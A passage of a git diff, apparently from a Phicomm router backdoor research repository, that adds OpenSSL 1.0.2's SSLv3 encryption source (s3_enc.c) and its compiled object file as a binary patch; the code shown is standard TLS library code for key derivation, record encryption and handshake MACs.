+        EVP_DigestUpdate(&s1, s->s3->client_random, SSL3_RANDOM_SIZE);
+        EVP_DigestFinal_ex(&s1, smd, NULL);
+
+        EVP_DigestInit_ex(&m5, EVP_md5(), NULL);
+        EVP_DigestUpdate(&m5, s->session->master_key,
+                         s->session->master_key_length);
+        EVP_DigestUpdate(&m5, smd, SHA_DIGEST_LENGTH);
+        if ((int)(i + MD5_DIGEST_LENGTH) > num) {
+            EVP_DigestFinal_ex(&m5, smd, NULL);
+            memcpy(km, smd, (num - i));
+        } else
+            EVP_DigestFinal_ex(&m5, km, NULL);
+
+        km += MD5_DIGEST_LENGTH;
+    }
+    OPENSSL_cleanse(smd, SHA_DIGEST_LENGTH);
+    EVP_MD_CTX_cleanup(&m5);
+    EVP_MD_CTX_cleanup(&s1);
+    return 1;
+}
+
+int ssl3_change_cipher_state(SSL *s, int which)
+{
+    unsigned char *p, *mac_secret;
+    unsigned char exp_key[EVP_MAX_KEY_LENGTH];
+    unsigned char exp_iv[EVP_MAX_IV_LENGTH];
+    unsigned char *ms, *key, *iv, *er1, *er2;
+    EVP_CIPHER_CTX *dd;
+    const EVP_CIPHER *c;
+#ifndef OPENSSL_NO_COMP
+    COMP_METHOD *comp;
+#endif
+    const EVP_MD *m;
+    EVP_MD_CTX md;
+    int is_exp, n, i, j, k, cl;
+    int reuse_dd = 0;
+
+    is_exp = SSL_C_IS_EXPORT(s->s3->tmp.new_cipher);
+    c = s->s3->tmp.new_sym_enc;
+    m = s->s3->tmp.new_hash;
+    /* m == NULL will lead to a crash later */
+    OPENSSL_assert(m);
+#ifndef OPENSSL_NO_COMP
+    if (s->s3->tmp.new_compression == NULL)
+        comp = NULL;
+    else
+        comp = s->s3->tmp.new_compression->method;
+#endif
+
+    if (which & SSL3_CC_READ) {
+        if (s->enc_read_ctx != NULL)
+            reuse_dd = 1;
+        else if ((s->enc_read_ctx =
+                  OPENSSL_malloc(sizeof(EVP_CIPHER_CTX))) == NULL)
+            goto err;
+        else
+            /*
+             * make sure it's intialized in case we exit later with an error
+             */
+            EVP_CIPHER_CTX_init(s->enc_read_ctx);
+        dd = s->enc_read_ctx;
+
+        ssl_replace_hash(&s->read_hash, m);
+#ifndef OPENSSL_NO_COMP
+        /* COMPRESS */
+        if (s->expand != NULL) {
+            COMP_CTX_free(s->expand);
+            s->expand = NULL;
+        }
+        if (comp != NULL) {
+            s->expand = COMP_CTX_new(comp);
+            if (s->expand == NULL) {
+                SSLerr(SSL_F_SSL3_CHANGE_CIPHER_STATE,
+                       SSL_R_COMPRESSION_LIBRARY_ERROR);
+                goto err2;
+            }
+            if (s->s3->rrec.comp == NULL)
+                s->s3->rrec.comp = (unsigned char *)
+                    OPENSSL_malloc(SSL3_RT_MAX_PLAIN_LENGTH);
+            if (s->s3->rrec.comp == NULL)
+                goto err;
+        }
+#endif
+        memset(&(s->s3->read_sequence[0]), 0, 8);
+        mac_secret = &(s->s3->read_mac_secret[0]);
+    } else {
+        if (s->enc_write_ctx != NULL)
+            reuse_dd = 1;
+        else if ((s->enc_write_ctx =
+                  OPENSSL_malloc(sizeof(EVP_CIPHER_CTX))) == NULL)
+            goto err;
+        else
+            /*
+             * make sure it's intialized in case we exit later with an error
+             */
+            EVP_CIPHER_CTX_init(s->enc_write_ctx);
+        dd = s->enc_write_ctx;
+        ssl_replace_hash(&s->write_hash, m);
+#ifndef OPENSSL_NO_COMP
+        /* COMPRESS */
+        if (s->compress != NULL) {
+            COMP_CTX_free(s->compress);
+            s->compress = NULL;
+        }
+        if (comp != NULL) {
+            s->compress = COMP_CTX_new(comp);
+            if (s->compress == NULL) {
+                SSLerr(SSL_F_SSL3_CHANGE_CIPHER_STATE,
+                       SSL_R_COMPRESSION_LIBRARY_ERROR);
+                goto err2;
+            }
+        }
+#endif
+        memset(&(s->s3->write_sequence[0]), 0, 8);
+        mac_secret = &(s->s3->write_mac_secret[0]);
+    }
+
+    if (reuse_dd)
+        EVP_CIPHER_CTX_cleanup(dd);
+
+    p = s->s3->tmp.key_block;
+    i = EVP_MD_size(m);
+    if (i < 0)
+        goto err2;
+    cl = EVP_CIPHER_key_length(c);
+    j = is_exp ? (cl < SSL_C_EXPORT_KEYLENGTH(s->s3->tmp.new_cipher) ?
+                  cl : SSL_C_EXPORT_KEYLENGTH(s->s3->tmp.new_cipher)) : cl;
+    /* Was j=(is_exp)?5:EVP_CIPHER_key_length(c); */
+    k = EVP_CIPHER_iv_length(c);
+    if ((which == SSL3_CHANGE_CIPHER_CLIENT_WRITE) ||
+        (which == SSL3_CHANGE_CIPHER_SERVER_READ)) {
+        ms = &(p[0]);
+        n = i + i;
+        key = &(p[n]);
+        n += j + j;
+        iv = &(p[n]);
+        n += k + k;
+        er1 = &(s->s3->client_random[0]);
+        er2 = &(s->s3->server_random[0]);
+    } else {
+        n = i;
+        ms = &(p[n]);
+        n += i + j;
+        key = &(p[n]);
+        n += j + k;
+        iv = &(p[n]);
+        n += k;
+        er1 = &(s->s3->server_random[0]);
+        er2 = &(s->s3->client_random[0]);
+    }
+
+    if (n > s->s3->tmp.key_block_length) {
+        SSLerr(SSL_F_SSL3_CHANGE_CIPHER_STATE, ERR_R_INTERNAL_ERROR);
+        goto err2;
+    }
+
+    EVP_MD_CTX_init(&md);
+    memcpy(mac_secret, ms, i);
+    if (is_exp) {
+        /*
+         * In here I set both the read and write key/iv to the same value
+         * since only the correct one will be used :-).
+         */
+        EVP_DigestInit_ex(&md, EVP_md5(), NULL);
+        EVP_DigestUpdate(&md, key, j);
+        EVP_DigestUpdate(&md, er1, SSL3_RANDOM_SIZE);
+        EVP_DigestUpdate(&md, er2, SSL3_RANDOM_SIZE);
+        EVP_DigestFinal_ex(&md, &(exp_key[0]), NULL);
+        key = &(exp_key[0]);
+
+        if (k > 0) {
+            EVP_DigestInit_ex(&md, EVP_md5(), NULL);
+            EVP_DigestUpdate(&md, er1, SSL3_RANDOM_SIZE);
+            EVP_DigestUpdate(&md, er2, SSL3_RANDOM_SIZE);
+            EVP_DigestFinal_ex(&md, &(exp_iv[0]), NULL);
+            iv = &(exp_iv[0]);
+        }
+    }
+
+    s->session->key_arg_length = 0;
+
+    EVP_CipherInit_ex(dd, c, NULL, key, iv, (which & SSL3_CC_WRITE));
+
+#ifdef OPENSSL_SSL_TRACE_CRYPTO
+    if (s->msg_callback) {
+
+        int wh = which & SSL3_CC_WRITE ?
+            TLS1_RT_CRYPTO_WRITE : TLS1_RT_CRYPTO_READ;
+        s->msg_callback(2, s->version, wh | TLS1_RT_CRYPTO_MAC,
+                        mac_secret, EVP_MD_size(m), s, s->msg_callback_arg);
+        if (c->key_len)
+            s->msg_callback(2, s->version, wh | TLS1_RT_CRYPTO_KEY,
+                            key, c->key_len, s, s->msg_callback_arg);
+        if (k) {
+            s->msg_callback(2, s->version, wh | TLS1_RT_CRYPTO_IV,
+                            iv, k, s, s->msg_callback_arg);
+        }
+    }
+#endif
+
+    OPENSSL_cleanse(&(exp_key[0]), sizeof(exp_key));
+    OPENSSL_cleanse(&(exp_iv[0]), sizeof(exp_iv));
+    EVP_MD_CTX_cleanup(&md);
+    return (1);
+ err:
+    SSLerr(SSL_F_SSL3_CHANGE_CIPHER_STATE, ERR_R_MALLOC_FAILURE);
+ err2:
+    return (0);
+}
+
+int ssl3_setup_key_block(SSL *s)
+{
+    unsigned char *p;
+    const EVP_CIPHER *c;
+    const EVP_MD *hash;
+    int num;
+    int ret = 0;
+    SSL_COMP *comp;
+
+    if (s->s3->tmp.key_block_length != 0)
+        return (1);
+
+    if (!ssl_cipher_get_evp(s->session, &c, &hash, NULL, NULL, &comp)) {
+        SSLerr(SSL_F_SSL3_SETUP_KEY_BLOCK, SSL_R_CIPHER_OR_HASH_UNAVAILABLE);
+        return (0);
+    }
+
+    s->s3->tmp.new_sym_enc = c;
+    s->s3->tmp.new_hash = hash;
+#ifdef OPENSSL_NO_COMP
+    s->s3->tmp.new_compression = NULL;
+#else
+    s->s3->tmp.new_compression = comp;
+#endif
+
+    num = EVP_MD_size(hash);
+    if (num < 0)
+        return 0;
+
+    num = EVP_CIPHER_key_length(c) + num + EVP_CIPHER_iv_length(c);
+    num *= 2;
+
+    ssl3_cleanup_key_block(s);
+
+    if ((p = OPENSSL_malloc(num)) == NULL)
+        goto err;
+
+    s->s3->tmp.key_block_length = num;
+    s->s3->tmp.key_block = p;
+
+    ret = ssl3_generate_key_block(s, p, num);
+
+    if (!(s->options & SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS)) {
+        /*
+         * enable vulnerability countermeasure for CBC ciphers with known-IV
+         * problem (http://www.openssl.org/~bodo/tls-cbc.txt)
+         */
+        s->s3->need_empty_fragments = 1;
+
+        if (s->session->cipher != NULL) {
+            if (s->session->cipher->algorithm_enc == SSL_eNULL)
+                s->s3->need_empty_fragments = 0;
+
+#ifndef OPENSSL_NO_RC4
+            if (s->session->cipher->algorithm_enc == SSL_RC4)
+                s->s3->need_empty_fragments = 0;
+#endif
+        }
+    }
+
+    return ret;
+
+ err:
+    SSLerr(SSL_F_SSL3_SETUP_KEY_BLOCK, ERR_R_MALLOC_FAILURE);
+    return (0);
+}
+
+void ssl3_cleanup_key_block(SSL *s)
+{
+    if (s->s3->tmp.key_block != NULL) {
+        OPENSSL_cleanse(s->s3->tmp.key_block, s->s3->tmp.key_block_length);
+        OPENSSL_free(s->s3->tmp.key_block);
+        s->s3->tmp.key_block = NULL;
+    }
+    s->s3->tmp.key_block_length = 0;
+}
+
+/*-
+ * ssl3_enc encrypts/decrypts the record in |s->wrec| / |s->rrec|, respectively.
+ *
+ * Returns:
+ *   0: (in non-constant time) if the record is publically invalid (i.e. too
+ *       short etc).
+ *   1: if the record's padding is valid / the encryption was successful.
+ *   -1: if the record's padding is invalid or, if sending, an internal error
+ *       occured.
+ */
+int ssl3_enc(SSL *s, int send)
+{
+    SSL3_RECORD *rec;
+    EVP_CIPHER_CTX *ds;
+    unsigned long l;
+    int bs, i, mac_size = 0;
+    const EVP_CIPHER *enc;
+
+    if (send) {
+        ds = s->enc_write_ctx;
+        rec = &(s->s3->wrec);
+        if (s->enc_write_ctx == NULL)
+            enc = NULL;
+        else
+            enc = EVP_CIPHER_CTX_cipher(s->enc_write_ctx);
+    } else {
+        ds = s->enc_read_ctx;
+        rec = &(s->s3->rrec);
+        if (s->enc_read_ctx == NULL)
+            enc = NULL;
+        else
+            enc = EVP_CIPHER_CTX_cipher(s->enc_read_ctx);
+    }
+
+    if ((s->session == NULL) || (ds == NULL) || (enc == NULL)) {
+        memmove(rec->data, rec->input, rec->length);
+        rec->input = rec->data;
+    } else {
+        l = rec->length;
+        bs = EVP_CIPHER_block_size(ds->cipher);
+
+        /* COMPRESS */
+
+        if ((bs != 1) && send) {
+            i = bs - ((int)l % bs);
+
+            /* we need to add 'i-1' padding bytes */
+            l += i;
+            /*
+             * the last of these zero bytes will be overwritten with the
+             * padding length.
+             */
+            memset(&rec->input[rec->length], 0, i);
+            rec->length += i;
+            rec->input[l - 1] = (i - 1);
+        }
+
+        if (!send) {
+            if (l == 0 || l % bs != 0)
+                return 0;
+            /* otherwise, rec->length >= bs */
+        }
+
+        if (EVP_Cipher(ds, rec->data, rec->input, l) < 1)
+            return -1;
+
+        if (EVP_MD_CTX_md(s->read_hash) != NULL)
+            mac_size = EVP_MD_CTX_size(s->read_hash);
+        if ((bs != 1) && !send)
+            return ssl3_cbc_remove_padding(s, rec, bs, mac_size);
+    }
+    return (1);
+}
+
+void ssl3_init_finished_mac(SSL *s)
+{
+    if (s->s3->handshake_buffer)
+        BIO_free(s->s3->handshake_buffer);
+    if (s->s3->handshake_dgst)
+        ssl3_free_digest_list(s);
+    s->s3->handshake_buffer = BIO_new(BIO_s_mem());
+    (void)BIO_set_close(s->s3->handshake_buffer, BIO_CLOSE);
+}
+
+void ssl3_free_digest_list(SSL *s)
+{
+    int i;
+    if (!s->s3->handshake_dgst)
+        return;
+    for (i = 0; i < SSL_MAX_DIGEST; i++) {
+        if (s->s3->handshake_dgst[i])
+            EVP_MD_CTX_destroy(s->s3->handshake_dgst[i]);
+    }
+    OPENSSL_free(s->s3->handshake_dgst);
+    s->s3->handshake_dgst = NULL;
+}
+
+void ssl3_finish_mac(SSL *s, const unsigned char *buf, int len)
+{
+    if (s->s3->handshake_buffer
+        && !(s->s3->flags & TLS1_FLAGS_KEEP_HANDSHAKE)) {
+        BIO_write(s->s3->handshake_buffer, (void *)buf, len);
+    } else {
+        int i;
+        for (i = 0; i < SSL_MAX_DIGEST; i++) {
+            if (s->s3->handshake_dgst[i] != NULL)
+                EVP_DigestUpdate(s->s3->handshake_dgst[i], buf, len);
+        }
+    }
+}
+
+int ssl3_digest_cached_records(SSL *s)
+{
+    int i;
+    long mask;
+    const EVP_MD *md;
+    long hdatalen;
+    void *hdata;
+
+    /* Allocate handshake_dgst array */
+    ssl3_free_digest_list(s);
+    s->s3->handshake_dgst =
+        OPENSSL_malloc(SSL_MAX_DIGEST * sizeof(EVP_MD_CTX *));
+    memset(s->s3->handshake_dgst, 0, SSL_MAX_DIGEST * sizeof(EVP_MD_CTX *));
+    hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
+    if (hdatalen <= 0) {
+        SSLerr(SSL_F_SSL3_DIGEST_CACHED_RECORDS, SSL_R_BAD_HANDSHAKE_LENGTH);
+        return 0;
+    }
+
+    /* Loop through bitso of algorithm2 field and create MD_CTX-es */
+    for (i = 0; ssl_get_handshake_digest(i, &mask, &md); i++) {
+        if ((mask & ssl_get_algorithm2(s)) && md) {
+            s->s3->handshake_dgst[i] = EVP_MD_CTX_create();
+#ifdef OPENSSL_FIPS
+            if (EVP_MD_nid(md) == NID_md5) {
+                EVP_MD_CTX_set_flags(s->s3->handshake_dgst[i],
+                                     EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+            }
+#endif
+            EVP_DigestInit_ex(s->s3->handshake_dgst[i], md, NULL);
+            EVP_DigestUpdate(s->s3->handshake_dgst[i], hdata, hdatalen);
+        } else {
+            s->s3->handshake_dgst[i] = NULL;
+        }
+    }
+    if (!(s->s3->flags & TLS1_FLAGS_KEEP_HANDSHAKE)) {
+        /* Free handshake_buffer BIO */
+        BIO_free(s->s3->handshake_buffer);
+        s->s3->handshake_buffer = NULL;
+    }
+
+    return 1;
+}
+
+int ssl3_cert_verify_mac(SSL *s, int md_nid, unsigned char *p)
+{
+    return (ssl3_handshake_mac(s, md_nid, NULL, 0, p));
+}
+
+int ssl3_final_finish_mac(SSL *s,
+                          const char *sender, int len, unsigned char *p)
+{
+    int ret, sha1len;
+    ret = ssl3_handshake_mac(s, NID_md5, sender, len, p);
+    if (ret == 0)
+        return 0;
+
+    p += ret;
+
+    sha1len = ssl3_handshake_mac(s, NID_sha1, sender, len, p);
+    if (sha1len == 0)
+        return 0;
+
+    ret += sha1len;
+    return (ret);
+}
+
+static int ssl3_handshake_mac(SSL *s, int md_nid,
+                              const char *sender, int len, unsigned char *p)
+{
+    unsigned int ret;
+    int npad, n;
+    unsigned int i;
+    unsigned char md_buf[EVP_MAX_MD_SIZE];
+    EVP_MD_CTX ctx, *d = NULL;
+
+    if (s->s3->handshake_buffer)
+        if (!ssl3_digest_cached_records(s))
+            return 0;
+
+    /*
+     * Search for digest of specified type in the handshake_dgst array
+     */
+    for (i = 0; i < SSL_MAX_DIGEST; i++) {
+        if (s->s3->handshake_dgst[i]
+            && EVP_MD_CTX_type(s->s3->handshake_dgst[i]) == md_nid) {
+            d = s->s3->handshake_dgst[i];
+            break;
+        }
+    }
+    if (!d) {
+        SSLerr(SSL_F_SSL3_HANDSHAKE_MAC, SSL_R_NO_REQUIRED_DIGEST);
+        return 0;
+    }
+    EVP_MD_CTX_init(&ctx);
+    EVP_MD_CTX_set_flags(&ctx, EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+    EVP_MD_CTX_copy_ex(&ctx, d);
+    n = EVP_MD_CTX_size(&ctx);
+    if (n < 0)
+        return 0;
+
+    npad = (48 / n) * n;
+    if (sender != NULL)
+        EVP_DigestUpdate(&ctx, sender, len);
+    EVP_DigestUpdate(&ctx, s->session->master_key,
+                     s->session->master_key_length);
+    EVP_DigestUpdate(&ctx, ssl3_pad_1, npad);
+    EVP_DigestFinal_ex(&ctx, md_buf, &i);
+
+    EVP_DigestInit_ex(&ctx, EVP_MD_CTX_md(&ctx), NULL);
+    EVP_DigestUpdate(&ctx, s->session->master_key,
+                     s->session->master_key_length);
+    EVP_DigestUpdate(&ctx, ssl3_pad_2, npad);
+    EVP_DigestUpdate(&ctx, md_buf, i);
+    EVP_DigestFinal_ex(&ctx, p, &ret);
+
+    EVP_MD_CTX_cleanup(&ctx);
+
+    return ((int)ret);
+}
+
+int n_ssl3_mac(SSL *ssl, unsigned char *md, int send)
+{
+    SSL3_RECORD *rec;
+    unsigned char *mac_sec, *seq;
+    EVP_MD_CTX md_ctx;
+    const EVP_MD_CTX *hash;
+    unsigned char *p, rec_char;
+    size_t md_size, orig_len;
+    int npad;
+    int t;
+
+    if (send) {
+        rec = &(ssl->s3->wrec);
+        mac_sec = &(ssl->s3->write_mac_secret[0]);
+        seq = &(ssl->s3->write_sequence[0]);
+        hash = ssl->write_hash;
+    } else {
+        rec = &(ssl->s3->rrec);
+        mac_sec = &(ssl->s3->read_mac_secret[0]);
+        seq = &(ssl->s3->read_sequence[0]);
+        hash = ssl->read_hash;
+    }
+
+    t = EVP_MD_CTX_size(hash);
+    if (t < 0)
+        return -1;
+    md_size = t;
+    npad = (48 / md_size) * md_size;
+
+    /*
+     * kludge: ssl3_cbc_remove_padding passes padding length in rec->type
+     */
+    orig_len = rec->length + md_size + ((unsigned int)rec->type >> 8);
+    rec->type &= 0xff;
+
+    if (!send &&
+        EVP_CIPHER_CTX_mode(ssl->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
+        ssl3_cbc_record_digest_supported(hash)) {
+        /*
+         * This is a CBC-encrypted record. We must avoid leaking any
+         * timing-side channel information about how many blocks of data we
+         * are hashing because that gives an attacker a timing-oracle.
+         */
+
+        /*-
+         * npad is, at most, 48 bytes and that's with MD5:
+         *   16 + 48 + 8 (sequence bytes) + 1 + 2 = 75.
+         *
+         * With SHA-1 (the largest hash speced for SSLv3) the hash size
+         * goes up 4, but npad goes down by 8, resulting in a smaller
+         * total size.
+         */
+        unsigned char header[75];
+        unsigned j = 0;
+        memcpy(header + j, mac_sec, md_size);
+        j += md_size;
+        memcpy(header + j, ssl3_pad_1, npad);
+        j += npad;
+        memcpy(header + j, seq, 8);
+        j += 8;
+        header[j++] = rec->type;
+        header[j++] = rec->length >> 8;
+        header[j++] = rec->length & 0xff;
+
+        /* Final param == is SSLv3 */
+        ssl3_cbc_digest_record(hash,
+                               md, &md_size,
+                               header, rec->input,
+                               rec->length + md_size, orig_len,
+                               mac_sec, md_size, 1);
+    } else {
+        unsigned int md_size_u;
+        /* Chop the digest off the end :-) */
+        EVP_MD_CTX_init(&md_ctx);
+
+        EVP_MD_CTX_copy_ex(&md_ctx, hash);
+        EVP_DigestUpdate(&md_ctx, mac_sec, md_size);
+        EVP_DigestUpdate(&md_ctx, ssl3_pad_1, npad);
+        EVP_DigestUpdate(&md_ctx, seq, 8);
+        rec_char = rec->type;
+        EVP_DigestUpdate(&md_ctx, &rec_char, 1);
+        p = md;
+        s2n(rec->length, p);
+        EVP_DigestUpdate(&md_ctx, md, 2);
+        EVP_DigestUpdate(&md_ctx, rec->input, rec->length);
+        EVP_DigestFinal_ex(&md_ctx, md, NULL);
+
+        EVP_MD_CTX_copy_ex(&md_ctx, hash);
+        EVP_DigestUpdate(&md_ctx, mac_sec, md_size);
+        EVP_DigestUpdate(&md_ctx, ssl3_pad_2, npad);
+        EVP_DigestUpdate(&md_ctx, md, md_size);
+        EVP_DigestFinal_ex(&md_ctx, md, &md_size_u);
+        md_size = md_size_u;
+
+        EVP_MD_CTX_cleanup(&md_ctx);
+    }
+
+    ssl3_record_sequence_update(seq);
+    return (md_size);
+}
+
+void ssl3_record_sequence_update(unsigned char *seq)
+{
+    int i;
+
+    for (i = 7; i >= 0; i--) {
+        ++seq[i];
+        if (seq[i] != 0)
+            break;
+    }
+}
+
+int ssl3_generate_master_secret(SSL *s, unsigned char *out, unsigned char *p,
+                                int len)
+{
+    static const unsigned char *salt[3] = {
+#ifndef CHARSET_EBCDIC
+        (const unsigned char *)"A",
+        (const unsigned char *)"BB",
+        (const unsigned char *)"CCC",
+#else
+        (const unsigned char *)"\x41",
+        (const unsigned char *)"\x42\x42",
+        (const unsigned char *)"\x43\x43\x43",
+#endif
+    };
+    unsigned char buf[EVP_MAX_MD_SIZE];
+    EVP_MD_CTX ctx;
+    int i, ret = 0;
+    unsigned int n;
+#ifdef OPENSSL_SSL_TRACE_CRYPTO
+    unsigned char *tmpout = out;
+#endif
+
+    EVP_MD_CTX_init(&ctx);
+    for (i = 0; i < 3; i++) {
+        EVP_DigestInit_ex(&ctx, s->ctx->sha1, NULL);
+        EVP_DigestUpdate(&ctx, salt[i], strlen((const char *)salt[i]));
+        EVP_DigestUpdate(&ctx, p, len);
+        EVP_DigestUpdate(&ctx, &(s->s3->client_random[0]), SSL3_RANDOM_SIZE);
+        EVP_DigestUpdate(&ctx, &(s->s3->server_random[0]), SSL3_RANDOM_SIZE);
+        EVP_DigestFinal_ex(&ctx, buf, &n);
+
+        EVP_DigestInit_ex(&ctx, s->ctx->md5, NULL);
+        EVP_DigestUpdate(&ctx, p, len);
+        EVP_DigestUpdate(&ctx, buf, n);
+        EVP_DigestFinal_ex(&ctx, out, &n);
+        out += n;
+        ret += n;
+    }
+    EVP_MD_CTX_cleanup(&ctx);
+
+#ifdef OPENSSL_SSL_TRACE_CRYPTO
+    if (s->msg_callback) {
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_PREMASTER,
+                        p, len, s, s->msg_callback_arg);
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_CLIENT_RANDOM,
+                        s->s3->client_random, SSL3_RANDOM_SIZE,
+                        s, s->msg_callback_arg);
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_SERVER_RANDOM,
+                        s->s3->server_random, SSL3_RANDOM_SIZE,
+                        s, s->msg_callback_arg);
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_MASTER,
+                        tmpout, SSL3_MASTER_SECRET_SIZE,
+                        s, s->msg_callback_arg);
+    }
+#endif
+    return (ret);
+}
+
+int ssl3_alert_code(int code)
+{
+    switch (code) {
+    case SSL_AD_CLOSE_NOTIFY:
+        return (SSL3_AD_CLOSE_NOTIFY);
+    case SSL_AD_UNEXPECTED_MESSAGE:
+        return (SSL3_AD_UNEXPECTED_MESSAGE);
+    case SSL_AD_BAD_RECORD_MAC:
+        return (SSL3_AD_BAD_RECORD_MAC);
+    case SSL_AD_DECRYPTION_FAILED:
+        return (SSL3_AD_BAD_RECORD_MAC);
+    case SSL_AD_RECORD_OVERFLOW:
+        return (SSL3_AD_BAD_RECORD_MAC);
+    case SSL_AD_DECOMPRESSION_FAILURE:
+        return (SSL3_AD_DECOMPRESSION_FAILURE);
+    case SSL_AD_HANDSHAKE_FAILURE:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_NO_CERTIFICATE:
+        return (SSL3_AD_NO_CERTIFICATE);
+    case SSL_AD_BAD_CERTIFICATE:
+        return (SSL3_AD_BAD_CERTIFICATE);
+    case SSL_AD_UNSUPPORTED_CERTIFICATE:
+        return (SSL3_AD_UNSUPPORTED_CERTIFICATE);
+    case SSL_AD_CERTIFICATE_REVOKED:
+        return (SSL3_AD_CERTIFICATE_REVOKED);
+    case SSL_AD_CERTIFICATE_EXPIRED:
+        return (SSL3_AD_CERTIFICATE_EXPIRED);
+    case SSL_AD_CERTIFICATE_UNKNOWN:
+        return (SSL3_AD_CERTIFICATE_UNKNOWN);
+    case SSL_AD_ILLEGAL_PARAMETER:
+        return (SSL3_AD_ILLEGAL_PARAMETER);
+    case SSL_AD_UNKNOWN_CA:
+        return (SSL3_AD_BAD_CERTIFICATE);
+    case SSL_AD_ACCESS_DENIED:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_DECODE_ERROR:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_DECRYPT_ERROR:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_EXPORT_RESTRICTION:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_PROTOCOL_VERSION:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_INSUFFICIENT_SECURITY:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_INTERNAL_ERROR:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_USER_CANCELLED:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_NO_RENEGOTIATION:
+        return (-1);            /* Don't send it :-) */
+    case SSL_AD_UNSUPPORTED_EXTENSION:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_CERTIFICATE_UNOBTAINABLE:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_UNRECOGNIZED_NAME:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_BAD_CERTIFICATE_HASH_VALUE:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_UNKNOWN_PSK_IDENTITY:
+        return (TLS1_AD_UNKNOWN_PSK_IDENTITY);
+    case SSL_AD_INAPPROPRIATE_FALLBACK:
+        return (TLS1_AD_INAPPROPRIATE_FALLBACK);
+    default:
+        return (-1);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..dcc5496496e5f615d2f60b86f3542843c78e69b2
GIT binary patch
literal 14744
zcmbtb4Rlo1oqv-VAYzz_ENjyRad1a>{E8Vs4IZ_bWCq^Iqfin)y5Np+GLV#fHJRbV
zqJ|EGc|Jz5b-UHAyY4RMtXo@gw>{m68shR1q*@_v74cNjx=M`Sv_M^T_V>T<-pM~h
z-tl<$o-^;g`@8?I`@jGDzaN1+qsIIamrGN{rQN8F))cB~E3Y2?t`VO#+Id>JcG5TV
z)9{M$@|gKWcv-k%S-rmHy`yM1QvpwtZh0;aqN1By0|)UA4d~WgJp@=g9&yvF_anRv
z>)|t0GmU^>x4u)eDEn5rLeKp<2(|tZBG27G-zVr{tqyoHzjvj+8_V<`CLmq4=MlVi
zpT<Ma2{Q#@%-lxpx;dz42Yg$rph4iFS7VlFiRJpqQp0>(HzR=xo5|YNLrjA;Wq4_z
z6xGZ?#YhSY1&vZT9eyfONbO4Do)W2WWWtl=QOKfZX#EH;2dyj7#I!b%Wx?#LsmZ#v
zd8~<s`Ho>dazgdW+#4FmzUu33f>xsSn<p~IOTb+%Y|d;BRBK^#Fm<Ksl05=_6QJ)@
zZB1!<3I->0ThQgZe;_k3DLij5;#+)1NKyhkQ^V%o)Fg=V%t}|stRMA&H|LpdB#zhS
zJR9}g-TMF-iGf9~_h>9jf$Rjb$aMnkD+wwexiOq8i-&WbNqXW%*FhukM$Ed0<k)Nx
z*HJz9@5H2Ud4{BcH|F}Sj%X?s{8H<@@4tnP-|mZs213v7j(~9Zuf=Gz2K0!zI&i&i
zerTZcRm%2i&3wf$KcM~u4GRq?cSaCN*Za0U4Q67gCi<YD4-J7`HxGyk1}c_#8Gxwi
zmayc*-F~ncxt)PtybCSm0#>x4Au-4{BWbH9&B18))jJjn7F$nlbzq}XCd7{sLP)V#
z-F!{yh?z$tmJ#p}ncpzq2n}I;tH>1;FX7A^C4)5{m?&+`JtYk8uNg%)2R8PX7pk(G
zeH5@G({1;L@!h`#k3G{A9Zlq)h$-Eq&zT|Scxr;}hAsPOQmwi<ygGby_;14Ty_6y9
z)x0<VSGW2oX!UG9719%r(>O~1WqQCUo5w(dJ;Xspw*=8(53x~MCB#z#Dr6sG9g}&;
zo<in{SbfAB&E|bsH$HT-Xb*WzbXLzb1ZwnL3S*Ts0=h6GJCK%vb~hvq(?i;!TMdC~
z@^p=E?x0Mjn|&ga4fd1@ugkuf`;mcqACyzmo{_{>?b>g5)O_8wKNq=DLkN}$1dV08
ze+8>}f)Qy7$t*pS4a`F@XLMkOuNF##mk<|aMy@HaM9=*!&;v50jBr0>qO0$lz2pWR
zG!?qpTSz1Qr8b>3O9p*zYv7l_MKaP6!xiD&@*2Z+f&hPHUTdJtcTW_8V_QC_#Y5Rg
z^RoW~JeYm+(N2S51cG{gptqqkADQ=2m#t^ayrYN?8s;Y|(sk<>BCatr6U)o>%z<gP
zjdnz+Iiu$u-wA~dP5TN>=n++vM(RkpU=k0Sx$lh5NuijKv5IM8(u_ch;0ouW<)NW@
z7{c2x64O>S&_K{|`vn@gbok`XktuS<+N`n6{_<G<!0<nQk<a&&Og;CMFfhD_#!HA-
z(v(9^Wgb9VX?nhH{m`EAasvI}AXqR(@FZqEJCuSwOM`mmQ-5kAo}TnnyBV$8$V6L*
zZfy<FOu>Y<7wyprP3j}&nW8zZCSBP4!!q6cyk5_|S7F%8d-hbS+_3(W_!i~*R>F!A
zFY2@$qwYsNG_VLnrG|N0^et+w@aUPRsT*+Tizy$qPNsGH{zza_`hu9Xp(1A8S#Fp^
